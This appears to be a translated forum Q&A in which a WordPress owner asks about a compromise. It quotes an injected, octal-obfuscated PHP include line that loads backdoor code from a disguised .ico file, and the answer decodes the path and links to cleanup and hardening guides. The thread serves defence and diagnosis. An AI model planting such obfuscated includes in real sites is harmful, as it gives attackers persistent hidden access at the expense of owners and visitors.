看起来我的 wordpress 网站被黑了。以下代码片段位于 index.php, wp-config.php
<?php
/*6b9bb*/
@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
我变了:
但是,代码再次重复。什么可以是好的解决方案?
ps我正在使用siteground。
谢谢
小智 5
是的,有人包含一个 .ico 文件(用文本编辑器打开它,你会看到它是一些 php 代码,没有真正的 ico 文件)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
不知何故,尽管您更改了主机和密码,您的黑客仍可以进入,一旦他们进入,他们就可以设置各种后门以保持访问权限,他们的任何 .php 文件都可以做到这一点。在关闭他们使用的初始前门的那一刻是您的唯一职业。
遵循本文中的建议:https : //codex.wordpress.org/FAQ_My_site_was_hacked 然后:https : //codex.wordpress.org/Hardening_WordPress
这里有一些关于后门的链接:http : //smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012 /11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/
来源:https : //wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
| 归档时间: |
|
| 查看次数: |
2514 次 |
| 最近记录: |